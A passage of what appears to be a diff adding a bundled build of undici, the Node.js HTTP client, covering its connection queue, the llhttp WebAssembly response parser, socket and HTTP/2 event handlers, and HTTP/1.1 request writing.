this[kKeepAliveTimeoutThreshold] = keepAliveTimeoutThreshold == null ? 1e3 : keepAliveTimeoutThreshold + this[kKeepAliveTimeoutValue] = this[kKeepAliveDefaultTimeout] + this[kServerName] = null + this[kLocalAddress] = localAddress != null ? localAddress : null + this[kResuming] = 0 // 0, idle, 1, scheduled, 2 resuming + this[kNeedDrain] = 0 // 0, idle, 1, scheduled, 2 resuming + this[kHostHeader] = `host: ${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}\r\n` + this[kBodyTimeout] = bodyTimeout != null ? bodyTimeout : 300e3 + this[kHeadersTimeout] = headersTimeout != null ? headersTimeout : 300e3 + this[kStrictContentLength] = strictContentLength == null ? true : strictContentLength + this[kMaxRedirections] = maxRedirections + this[kMaxRequests] = maxRequestsPerClient + this[kClosedResolve] = null + this[kMaxResponseSize] = maxResponseSize > -1 ? maxResponseSize : -1 + this[kHTTPConnVersion] = 'h1' + + // HTTP/2 + this[kHTTP2Session] = null + this[kHTTP2SessionState] = !allowH2 + ? null + : { + // streams: null, // Fixed queue of streams - For future support of `push` + openStreams: 0, // Keep track of them to decide wether or not unref the session + maxConcurrentStreams: maxConcurrentStreams != null ? maxConcurrentStreams : 100 // Max peerConcurrentStreams for a Node h2 server + } + this[kHost] = `${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}` + + // kQueue is built up of 3 sections separated by + // the kRunningIdx and kPendingIdx indices. + // | complete | running | pending | + // ^ kRunningIdx ^ kPendingIdx ^ kQueue.length + // kRunningIdx points to the first running element. + // kPendingIdx points to the first pending element. + // This implements a fast queue with an amortized + // time of O(1). + + this[kQueue] = [] + this[kRunningIdx] = 0 + this[kPendingIdx] = 0 + } + + get pipelining () { + return this[kPipelining] + } + + set pipelining (value) { + this[kPipelining] = value + resume(this, true) + } + + get [kPending] () { + return this[kQueue].length - this[kPendingIdx] + } + + get [kRunning] () { + return this[kPendingIdx] - this[kRunningIdx] + } + + get [kSize] () { + return this[kQueue].length - this[kRunningIdx] + } + + get [kConnected] () { + return !!this[kSocket] && !this[kConnecting] && !this[kSocket].destroyed + } + + get [kBusy] () { + const socket = this[kSocket] + return ( + (socket && (socket[kReset] || socket[kWriting] || socket[kBlocking])) || + (this[kSize] >= (this[kPipelining] || 1)) || + this[kPending] > 0 + ) + } + + /* istanbul ignore: only used for test */ + [kConnect] (cb) { + connect(this) + this.once('connect', cb) + } + + [kDispatch] (opts, handler) { + const origin = opts.origin || this[kUrl].origin + + const request = this[kHTTPConnVersion] === 'h2' + ? Request[kHTTP2BuildRequest](origin, opts, handler) + : Request[kHTTP1BuildRequest](origin, opts, handler) + + this[kQueue].push(request) + if (this[kResuming]) { + // Do nothing. + } else if (util.bodyLength(request.body) == null && util.isIterable(request.body)) { + // Wait a tick in case stream/iterator is ended in the same tick. + this[kResuming] = 1 + process.nextTick(resume, this) + } else { + resume(this, true) + } + + if (this[kResuming] && this[kNeedDrain] !== 2 && this[kBusy]) { + this[kNeedDrain] = 2 + } + + return this[kNeedDrain] < 2 + } + + async [kClose] () { + // TODO: for H2 we need to gracefully flush the remaining enqueued + // request and close each stream. + return new Promise((resolve) => { + if (!this[kSize]) { + resolve(null) + } else { + this[kClosedResolve] = resolve + } + }) + } + + async [kDestroy] (err) { + return new Promise((resolve) => { + const requests = this[kQueue].splice(this[kPendingIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(this, request, err) + } + + const callback = () => { + if (this[kClosedResolve]) { + // TODO (fix): Should we error here with ClientDestroyedError? + this[kClosedResolve]() + this[kClosedResolve] = null + } + resolve() + } + + if (this[kHTTP2Session] != null) { + util.destroy(this[kHTTP2Session], err) + this[kHTTP2Session] = null + this[kHTTP2SessionState] = null + } + + if (!this[kSocket]) { + queueMicrotask(callback) + } else { + util.destroy(this[kSocket].on('close', callback), err) + } + + resume(this) + }) + } +} + +function onHttp2SessionError (err) { + assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') + + this[kSocket][kError] = err + + onError(this[kClient], err) +} + +function onHttp2FrameError (type, code, id) { + const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) + + if (id === 0) { + this[kSocket][kError] = err + onError(this[kClient], err) + } +} + +function onHttp2SessionEnd () { + util.destroy(this, new SocketError('other side closed')) + util.destroy(this[kSocket], new SocketError('other side closed')) +} + +function onHTTP2GoAway (code) { + const client = this[kClient] + const err = new InformationalError(`HTTP/2: "GOAWAY" frame received with code ${code}`) + client[kSocket] = null + client[kHTTP2Session] = null + + if (client.destroyed) { + assert(this[kPending] === 0) + + // Fail entire queue. + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(this, request, err) + } + } else if (client[kRunning] > 0) { + // Fail head of pipeline. + const request = client[kQueue][client[kRunningIdx]] + client[kQueue][client[kRunningIdx]++] = null + + errorRequest(client, request, err) + } + + client[kPendingIdx] = client[kRunningIdx] + + assert(client[kRunning] === 0) + + client.emit('disconnect', + client[kUrl], + [client], + err + ) + + resume(client) +} + +const constants = __nccwpck_require__(953) +const createRedirectInterceptor = __nccwpck_require__(8861) +const EMPTY_BUF = Buffer.alloc(0) + +async function lazyllhttp () { + const llhttpWasmData = process.env.JEST_WORKER_ID ? __nccwpck_require__(1145) : undefined + + let mod + try { + mod = await WebAssembly.compile(Buffer.from(__nccwpck_require__(5627), 'base64')) + } catch (e) { + /* istanbul ignore next */ + + // We could check if the error was caused by the simd option not + // being enabled, but the occurring of this other error + // * https://github.com/emscripten-core/emscripten/issues/11495 + // got me to remove that check to avoid breaking Node 12. + mod = await WebAssembly.compile(Buffer.from(llhttpWasmData || __nccwpck_require__(1145), 'base64')) + } + + return await WebAssembly.instantiate(mod, { + env: { + /* eslint-disable camelcase */ + + wasm_on_url: (p, at, len) => { + /* istanbul ignore next */ + return 0 + }, + wasm_on_status: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onStatus(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_message_begin: (p) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onMessageBegin() || 0 + }, + wasm_on_header_field: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onHeaderField(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_header_value: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onHeaderValue(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_headers_complete: (p, statusCode, upgrade, shouldKeepAlive) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onHeadersComplete(statusCode, Boolean(upgrade), Boolean(shouldKeepAlive)) || 0 + }, + wasm_on_body: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onBody(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_message_complete: (p) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onMessageComplete() || 0 + } + + /* eslint-enable camelcase */ + } + }) +} + +let llhttpInstance = null +let llhttpPromise = lazyllhttp() +llhttpPromise.catch() + +let currentParser = null +let currentBufferRef = null +let currentBufferSize = 0 +let currentBufferPtr = null + +const TIMEOUT_HEADERS = 1 +const TIMEOUT_BODY = 2 +const TIMEOUT_IDLE = 3 + +class Parser { + constructor (client, socket, { exports }) { + assert(Number.isFinite(client[kMaxHeadersSize]) && client[kMaxHeadersSize] > 0) + + this.llhttp = exports + this.ptr = this.llhttp.llhttp_alloc(constants.TYPE.RESPONSE) + this.client = client + this.socket = socket + this.timeout = null + this.timeoutValue = null + this.timeoutType = null + this.statusCode = null + this.statusText = '' + this.upgrade = false + this.headers = [] + this.headersSize = 0 + this.headersMaxSize = client[kMaxHeadersSize] + this.shouldKeepAlive = false + this.paused = false + this.resume = this.resume.bind(this) + + this.bytesRead = 0 + + this.keepAlive = '' + this.contentLength = '' + this.connection = '' + this.maxResponseSize = client[kMaxResponseSize] + } + + setTimeout (value, type) { + this.timeoutType = type + if (value !== this.timeoutValue) { + timers.clearTimeout(this.timeout) + if (value) { + this.timeout = timers.setTimeout(onParserTimeout, value, this) + // istanbul ignore else: only for jest + if (this.timeout.unref) { + this.timeout.unref() + } + } else { + this.timeout = null + } + this.timeoutValue = value + } else if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + } + + resume () { + if (this.socket.destroyed || !this.paused) { + return + } + + assert(this.ptr != null) + assert(currentParser == null) + + this.llhttp.llhttp_resume(this.ptr) + + assert(this.timeoutType === TIMEOUT_BODY) + if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + this.paused = false + this.execute(this.socket.read() || EMPTY_BUF) // Flush parser. + this.readMore() + } + + readMore () { + while (!this.paused && this.ptr) { + const chunk = this.socket.read() + if (chunk === null) { + break + } + this.execute(chunk) + } + } + + execute (data) { + assert(this.ptr != null) + assert(currentParser == null) + assert(!this.paused) + + const { socket, llhttp } = this + + if (data.length > currentBufferSize) { + if (currentBufferPtr) { + llhttp.free(currentBufferPtr) + } + currentBufferSize = Math.ceil(data.length / 4096) * 4096 + currentBufferPtr = llhttp.malloc(currentBufferSize) + } + + new Uint8Array(llhttp.memory.buffer, currentBufferPtr, currentBufferSize).set(data) + + // Call `execute` on the wasm parser. + // We pass the `llhttp_parser` pointer address, the pointer address of buffer view data, + // and finally the length of bytes to parse. + // The return value is an error code or `constants.ERROR.OK`. + try { + let ret + + try { + currentBufferRef = data + currentParser = this + ret = llhttp.llhttp_execute(this.ptr, currentBufferPtr, data.length) + /* eslint-disable-next-line no-useless-catch */ + } catch (err) { + /* istanbul ignore next: difficult to make a test case for */ + throw err + } finally { + currentParser = null + currentBufferRef = null + } + + const offset = llhttp.llhttp_get_error_pos(this.ptr) - currentBufferPtr + + if (ret === constants.ERROR.PAUSED_UPGRADE) { + this.onUpgrade(data.slice(offset)) + } else if (ret === constants.ERROR.PAUSED) { + this.paused = true + socket.unshift(data.slice(offset)) + } else if (ret !== constants.ERROR.OK) { + const ptr = llhttp.llhttp_get_error_reason(this.ptr) + let message = '' + /* istanbul ignore else: difficult to make a test case for */ + if (ptr) { + const len = new Uint8Array(llhttp.memory.buffer, ptr).indexOf(0) + message = + 'Response does not match the HTTP/1.1 protocol (' + + Buffer.from(llhttp.memory.buffer, ptr, len).toString() + + ')' + } + throw new HTTPParserError(message, constants.ERROR[ret], data.slice(offset)) + } + } catch (err) { + util.destroy(socket, err) + } + } + + destroy () { + assert(this.ptr != null) + assert(currentParser == null) + + this.llhttp.llhttp_free(this.ptr) + this.ptr = null + + timers.clearTimeout(this.timeout) + this.timeout = null + this.timeoutValue = null + this.timeoutType = null + + this.paused = false + } + + onStatus (buf) { + this.statusText = buf.toString() + } + + onMessageBegin () { + const { socket, client } = this + + /* istanbul ignore next: difficult to make a test case for */ + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + if (!request) { + return -1 + } + } + + onHeaderField (buf) { + const len = this.headers.length + + if ((len & 1) === 0) { + this.headers.push(buf) + } else { + this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) + } + + this.trackHeader(buf.length) + } + + onHeaderValue (buf) { + let len = this.headers.length + + if ((len & 1) === 1) { + this.headers.push(buf) + len += 1 + } else { + this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) + } + + const key = this.headers[len - 2] + if (key.length === 10 && key.toString().toLowerCase() === 'keep-alive') { + this.keepAlive += buf.toString() + } else if (key.length === 10 && key.toString().toLowerCase() === 'connection') { + this.connection += buf.toString() + } else if (key.length === 14 && key.toString().toLowerCase() === 'content-length') { + this.contentLength += buf.toString() + } + + this.trackHeader(buf.length) + } + + trackHeader (len) { + this.headersSize += len + if (this.headersSize >= this.headersMaxSize) { + util.destroy(this.socket, new HeadersOverflowError()) + } + } + + onUpgrade (head) { + const { upgrade, client, socket, headers, statusCode } = this + + assert(upgrade) + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert(!socket.destroyed) + assert(socket === client[kSocket]) + assert(!this.paused) + assert(request.upgrade || request.method === 'CONNECT') + + this.statusCode = null + this.statusText = '' + this.shouldKeepAlive = null + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + socket.unshift(head) + + socket[kParser].destroy() + socket[kParser] = null + + socket[kClient] = null + socket[kError] = null + socket + .removeListener('error', onSocketError) + .removeListener('readable', onSocketReadable) + .removeListener('end', onSocketEnd) + .removeListener('close', onSocketClose) + + client[kSocket] = null + client[kQueue][client[kRunningIdx]++] = null + client.emit('disconnect', client[kUrl], [client], new InformationalError('upgrade')) + + try { + request.onUpgrade(statusCode, headers, socket) + } catch (err) { + util.destroy(socket, err) + } + + resume(client) + } + + onHeadersComplete (statusCode, upgrade, shouldKeepAlive) { + const { client, socket, headers, statusText } = this + + /* istanbul ignore next: difficult to make a test case for */ + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + + /* istanbul ignore next: difficult to make a test case for */ + if (!request) { + return -1 + } + + assert(!this.upgrade) + assert(this.statusCode < 200) + + if (statusCode === 100) { + util.destroy(socket, new SocketError('bad response', util.getSocketInfo(socket))) + return -1 + } + + /* this can only happen if server is misbehaving */ + if (upgrade && !request.upgrade) { + util.destroy(socket, new SocketError('bad upgrade', util.getSocketInfo(socket))) + return -1 + } + + assert.strictEqual(this.timeoutType, TIMEOUT_HEADERS) + + this.statusCode = statusCode + this.shouldKeepAlive = ( + shouldKeepAlive || + // Override llhttp value which does not allow keepAlive for HEAD. + (request.method === 'HEAD' && !socket[kReset] && this.connection.toLowerCase() === 'keep-alive') + ) + + if (this.statusCode >= 200) { + const bodyTimeout = request.bodyTimeout != null + ? request.bodyTimeout + : client[kBodyTimeout] + this.setTimeout(bodyTimeout, TIMEOUT_BODY) + } else if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + if (request.method === 'CONNECT') { + assert(client[kRunning] === 1) + this.upgrade = true + return 2 + } + + if (upgrade) { + assert(client[kRunning] === 1) + this.upgrade = true + return 2 + } + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + if (this.shouldKeepAlive && client[kPipelining]) { + const keepAliveTimeout = this.keepAlive ? util.parseKeepAliveTimeout(this.keepAlive) : null + + if (keepAliveTimeout != null) { + const timeout = Math.min( + keepAliveTimeout - client[kKeepAliveTimeoutThreshold], + client[kKeepAliveMaxTimeout] + ) + if (timeout <= 0) { + socket[kReset] = true + } else { + client[kKeepAliveTimeoutValue] = timeout + } + } else { + client[kKeepAliveTimeoutValue] = client[kKeepAliveDefaultTimeout] + } + } else { + // Stop more requests from being dispatched. + socket[kReset] = true + } + + const pause = request.onHeaders(statusCode, headers, this.resume, statusText) === false + + if (request.aborted) { + return -1 + } + + if (request.method === 'HEAD') { + return 1 + } + + if (statusCode < 200) { + return 1 + } + + if (socket[kBlocking]) { + socket[kBlocking] = false + resume(client) + } + + return pause ? constants.ERROR.PAUSED : 0 + } + + onBody (buf) { + const { client, socket, statusCode, maxResponseSize } = this + + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert.strictEqual(this.timeoutType, TIMEOUT_BODY) + if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + assert(statusCode >= 200) + + if (maxResponseSize > -1 && this.bytesRead + buf.length > maxResponseSize) { + util.destroy(socket, new ResponseExceededMaxSizeError()) + return -1 + } + + this.bytesRead += buf.length + + if (request.onData(buf) === false) { + return constants.ERROR.PAUSED + } + } + + onMessageComplete () { + const { client, socket, statusCode, upgrade, headers, contentLength, bytesRead, shouldKeepAlive } = this + + if (socket.destroyed && (!statusCode || shouldKeepAlive)) { + return -1 + } + + if (upgrade) { + return + } + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert(statusCode >= 100) + + this.statusCode = null + this.statusText = '' + this.bytesRead = 0 + this.contentLength = '' + this.keepAlive = '' + this.connection = '' + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + if (statusCode < 200) { + return + } + + /* istanbul ignore next: should be handled by llhttp? */ + if (request.method !== 'HEAD' && contentLength && bytesRead !== parseInt(contentLength, 10)) { + util.destroy(socket, new ResponseContentLengthMismatchError()) + return -1 + } + + request.onComplete(headers) + + client[kQueue][client[kRunningIdx]++] = null + + if (socket[kWriting]) { + assert.strictEqual(client[kRunning], 0) + // Response completed before request. + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (!shouldKeepAlive) { + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (socket[kReset] && client[kRunning] === 0) { + // Destroy socket once all requests have completed. + // The request at the tail of the pipeline is the one + // that requested reset and no further requests should + // have been queued since then. + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (client[kPipelining] === 1) { + // We must wait a full event loop cycle to reuse this socket to make sure + // that non-spec compliant servers are not closing the connection even if they + // said they won't. + setImmediate(resume, client) + } else { + resume(client) + } + } +} + +function onParserTimeout (parser) { + const { socket, timeoutType, client } = parser + + /* istanbul ignore else */ + if (timeoutType === TIMEOUT_HEADERS) { + if (!socket[kWriting] || socket.writableNeedDrain || client[kRunning] > 1) { + assert(!parser.paused, 'cannot be paused while waiting for headers') + util.destroy(socket, new HeadersTimeoutError()) + } + } else if (timeoutType === TIMEOUT_BODY) { + if (!parser.paused) { + util.destroy(socket, new BodyTimeoutError()) + } + } else if (timeoutType === TIMEOUT_IDLE) { + assert(client[kRunning] === 0 && client[kKeepAliveTimeoutValue]) + util.destroy(socket, new InformationalError('socket idle timeout')) + } +} + +function onSocketReadable () { + const { [kParser]: parser } = this + if (parser) { + parser.readMore() + } +} + +function onSocketError (err) { + const { [kClient]: client, [kParser]: parser } = this + + assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') + + if (client[kHTTPConnVersion] !== 'h2') { + // On Mac OS, we get an ECONNRESET even if there is a full body to be forwarded + // to the user. + if (err.code === 'ECONNRESET' && parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so for as a valid response. + parser.onMessageComplete() + return + } + } + + this[kError] = err + + onError(this[kClient], err) +} + +function onError (client, err) { + if ( + client[kRunning] === 0 && + err.code !== 'UND_ERR_INFO' && + err.code !== 'UND_ERR_SOCKET' + ) { + // Error is not caused by running request and not a recoverable + // socket error. + + assert(client[kPendingIdx] === client[kRunningIdx]) + + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(client, request, err) + } + assert(client[kSize] === 0) + } +} + +function onSocketEnd () { + const { [kParser]: parser, [kClient]: client } = this + + if (client[kHTTPConnVersion] !== 'h2') { + if (parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so far as a valid response. + parser.onMessageComplete() + return + } + } + + util.destroy(this, new SocketError('other side closed', util.getSocketInfo(this))) +} + +function onSocketClose () { + const { [kClient]: client, [kParser]: parser } = this + + if (client[kHTTPConnVersion] === 'h1' && parser) { + if (!this[kError] && parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so far as a valid response. + parser.onMessageComplete() + } + + this[kParser].destroy() + this[kParser] = null + } + + const err = this[kError] || new SocketError('closed', util.getSocketInfo(this)) + + client[kSocket] = null + + if (client.destroyed) { + assert(client[kPending] === 0) + + // Fail entire queue. + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(client, request, err) + } + } else if (client[kRunning] > 0 && err.code !== 'UND_ERR_INFO') { + // Fail head of pipeline. + const request = client[kQueue][client[kRunningIdx]] + client[kQueue][client[kRunningIdx]++] = null + + errorRequest(client, request, err) + } + + client[kPendingIdx] = client[kRunningIdx] + + assert(client[kRunning] === 0) + + client.emit('disconnect', client[kUrl], [client], err) + + resume(client) +} + +async function connect (client) { + assert(!client[kConnecting]) + assert(!client[kSocket]) + + let { host, hostname, protocol, port } = client[kUrl] + + // Resolve ipv6 + if (hostname[0] === '[') { + const idx = hostname.indexOf(']') + + assert(idx !== -1) + const ip = hostname.substring(1, idx) + + assert(net.isIP(ip)) + hostname = ip + } + + client[kConnecting] = true + + if (channels.beforeConnect.hasSubscribers) { + channels.beforeConnect.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector] + }) + } + + try { + const socket = await new Promise((resolve, reject) => { + client[kConnector]({ + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, (err, socket) => { + if (err) { + reject(err) + } else { + resolve(socket) + } + }) + }) + + if (client.destroyed) { + util.destroy(socket.on('error', () => {}), new ClientDestroyedError()) + return + } + + client[kConnecting] = false + + assert(socket) + + const isH2 = socket.alpnProtocol === 'h2' + if (isH2) { + if (!h2ExperimentalWarned) { + h2ExperimentalWarned = true + process.emitWarning('H2 support is experimental, expect them to change at any time.', { + code: 'UNDICI-H2' + }) + } + + const session = http2.connect(client[kUrl], { + createConnection: () => socket, + peerMaxConcurrentStreams: client[kHTTP2SessionState].maxConcurrentStreams + }) + + client[kHTTPConnVersion] = 'h2' + session[kClient] = client + session[kSocket] = socket + session.on('error', onHttp2SessionError) + session.on('frameError', onHttp2FrameError) + session.on('end', onHttp2SessionEnd) + session.on('goaway', onHTTP2GoAway) + session.on('close', onSocketClose) + session.unref() + + client[kHTTP2Session] = session + socket[kHTTP2Session] = session + } else { + if (!llhttpInstance) { + llhttpInstance = await llhttpPromise + llhttpPromise = null + } + + socket[kNoRef] = false + socket[kWriting] = false + socket[kReset] = false + socket[kBlocking] = false + socket[kParser] = new Parser(client, socket, llhttpInstance) + } + + socket[kCounter] = 0 + socket[kMaxRequests] = client[kMaxRequests] + socket[kClient] = client + socket[kError] = null + + socket + .on('error', onSocketError) + .on('readable', onSocketReadable) + .on('end', onSocketEnd) + .on('close', onSocketClose) + + client[kSocket] = socket + + if (channels.connected.hasSubscribers) { + channels.connected.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector], + socket + }) + } + client.emit('connect', client[kUrl], [client]) + } catch (err) { + if (client.destroyed) { + return + } + + client[kConnecting] = false + + if (channels.connectError.hasSubscribers) { + channels.connectError.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector], + error: err + }) + } + + if (err.code === 'ERR_TLS_CERT_ALTNAME_INVALID') { + assert(client[kRunning] === 0) + while (client[kPending] > 0 && client[kQueue][client[kPendingIdx]].servername === client[kServerName]) { + const request = client[kQueue][client[kPendingIdx]++] + errorRequest(client, request, err) + } + } else { + onError(client, err) + } + + client.emit('connectionError', client[kUrl], [client], err) + } + + resume(client) +} + +function emitDrain (client) { + client[kNeedDrain] = 0 + client.emit('drain', client[kUrl], [client]) +} + +function resume (client, sync) { + if (client[kResuming] === 2) { + return + } + + client[kResuming] = 2 + + _resume(client, sync) + client[kResuming] = 0 + + if (client[kRunningIdx] > 256) { + client[kQueue].splice(0, client[kRunningIdx]) + client[kPendingIdx] -= client[kRunningIdx] + client[kRunningIdx] = 0 + } +} + +function _resume (client, sync) { + while (true) { + if (client.destroyed) { + assert(client[kPending] === 0) + return + } + + if (client[kClosedResolve] && !client[kSize]) { + client[kClosedResolve]() + client[kClosedResolve] = null + return + } + + const socket = client[kSocket] + + if (socket && !socket.destroyed && socket.alpnProtocol !== 'h2') { + if (client[kSize] === 0) { + if (!socket[kNoRef] && socket.unref) { + socket.unref() + socket[kNoRef] = true + } + } else if (socket[kNoRef] && socket.ref) { + socket.ref() + socket[kNoRef] = false + } + + if (client[kSize] === 0) { + if (socket[kParser].timeoutType !== TIMEOUT_IDLE) { + socket[kParser].setTimeout(client[kKeepAliveTimeoutValue], TIMEOUT_IDLE) + } + } else if (client[kRunning] > 0 && socket[kParser].statusCode < 200) { + if (socket[kParser].timeoutType !== TIMEOUT_HEADERS) { + const request = client[kQueue][client[kRunningIdx]] + const headersTimeout = request.headersTimeout != null + ? request.headersTimeout + : client[kHeadersTimeout] + socket[kParser].setTimeout(headersTimeout, TIMEOUT_HEADERS) + } + } + } + + if (client[kBusy]) { + client[kNeedDrain] = 2 + } else if (client[kNeedDrain] === 2) { + if (sync) { + client[kNeedDrain] = 1 + process.nextTick(emitDrain, client) + } else { + emitDrain(client) + } + continue + } + + if (client[kPending] === 0) { + return + } + + if (client[kRunning] >= (client[kPipelining] || 1)) { + return + } + + const request = client[kQueue][client[kPendingIdx]] + + if (client[kUrl].protocol === 'https:' && client[kServerName] !== request.servername) { + if (client[kRunning] > 0) { + return + } + + client[kServerName] = request.servername + + if (socket && socket.servername !== request.servername) { + util.destroy(socket, new InformationalError('servername changed')) + return + } + } + + if (client[kConnecting]) { + return + } + + if (!socket && !client[kHTTP2Session]) { + connect(client) + return + } + + if (socket.destroyed || socket[kWriting] || socket[kReset] || socket[kBlocking]) { + return + } + + if (client[kRunning] > 0 && !request.idempotent) { + // Non-idempotent request cannot be retried. + // Ensure that no other requests are inflight and + // could cause failure. + return + } + + if (client[kRunning] > 0 && (request.upgrade || request.method === 'CONNECT')) { + // Don't dispatch an upgrade until all preceding requests have completed. + // A misbehaving server might upgrade the connection before all pipelined + // request has completed. + return + } + + if (client[kRunning] > 0 && util.bodyLength(request.body) !== 0 && + (util.isStream(request.body) || util.isAsyncIterable(request.body))) { + // Request with stream or iterator body can error while other requests + // are inflight and indirectly error those as well. + // Ensure this doesn't happen by waiting for inflight + // to complete before dispatching. + + // Request with stream or iterator body cannot be retried. + // Ensure that no other requests are inflight and + // could cause failure. + return + } + + if (!request.aborted && write(client, request)) { + client[kPendingIdx]++ + } else { + client[kQueue].splice(client[kPendingIdx], 1) + } + } +} + +// https://www.rfc-editor.org/rfc/rfc7230#section-3.3.2 +function shouldSendContentLength (method) { + return method !== 'GET' && method !== 'HEAD' && method !== 'OPTIONS' && method !== 'TRACE' && method !== 'CONNECT' +} + +function write (client, request) { + if (client[kHTTPConnVersion] === 'h2') { + writeH2(client, client[kHTTP2Session], request) + return + } + + const { body, method, path, host, upgrade, headers, blocking, reset } = request + + // https://tools.ietf.org/html/rfc7231#section-4.3.1 + // https://tools.ietf.org/html/rfc7231#section-4.3.2 + // https://tools.ietf.org/html/rfc7231#section-4.3.5 + + // Sending a payload body on a request that does not + // expect it can cause undefined behavior on some + // servers and corrupt connection state. Do not + // re-use the connection for further requests. + + const expectsPayload = ( + method === 'PUT' || + method === 'POST' || + method === 'PATCH' + ) + + if (body && typeof body.read === 'function') { + // Try to read EOF in order to get length. + body.read(0) + } + + const bodyLength = util.bodyLength(body) + + let contentLength = bodyLength + + if (contentLength === null) { + contentLength = request.contentLength + } + + if (contentLength === 0 && !expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD NOT send a Content-Length header field when + // the request message does not contain a payload body and the method + // semantics do not anticipate such a body. + + contentLength = null + } + + // https://github.com/nodejs/undici/issues/2046 + // A user agent may send a Content-Length header with 0 value, this should be allowed. + if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength !== null && request.contentLength !== contentLength) { + if (client[kStrictContentLength]) { + errorRequest(client, request, new RequestContentLengthMismatchError()) + return false + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + const socket = client[kSocket] + + try { + request.onConnect((err) => { + if (request.aborted || request.completed) { + return + } + + errorRequest(client, request, err || new RequestAbortedError()) + + util.destroy(socket, new InformationalError('aborted')) + }) + } catch (err) { + errorRequest(client, request, err) + } + + if (request.aborted) { + return false + } + + if (method === 'HEAD') { + // https://github.com/mcollina/undici/issues/258 + // Close after a HEAD request to interop with misbehaving servers + // that may send a body in the response. + + socket[kReset] = true + } + + if (upgrade || method === 'CONNECT') { + // On CONNECT or upgrade, block pipeline from dispatching further + // requests on this connection. + + socket[kReset] = true + } + + if (reset != null) { + socket[kReset] = reset + } + + if (client[kMaxRequests] && socket[kCounter]++ >= client[kMaxRequests]) { + socket[kReset] = true + } + + if (blocking) { + socket[kBlocking] = true + } + + let header = `${method} ${path} HTTP/1.1\r\n` + + if (typeof host === 'string') { + header += `host: ${host}\r\n` + } else { + header += client[kHostHeader] + } + + if (upgrade) { + header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` + } else if (client[kPipelining] && !socket[kReset]) { + header += 'connection: keep-alive\r\n' + } else { + header += 'connection: close\r\n' + } + + if (headers) { + header += headers + } + + if (channels.sendHeaders.hasSubscribers) { + channels.sendHeaders.publish({ request, headers: header, socket }) + } + + /* istanbul ignore else: assertion */ + if (!body || bodyLength === 0) { + if (contentLength === 0) { + socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') + } else { + assert(contentLength === null, 'no body must not have content length') + socket.write(`${header}\r\n`, 'latin1') + } + request.onRequestSent() + } else if (util.isBuffer(body)) { + assert(contentLength === body.byteLength, 'buffer body must have content length') + + socket.cork() + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + socket.write(body) + socket.uncork() + request.onBodySent(body) + request.onRequestSent() + if (!expectsPayload) { + socket[kReset] = true + } + } else if (util.isBlobLike(body)) { + if (typeof body.stream === 'function') { 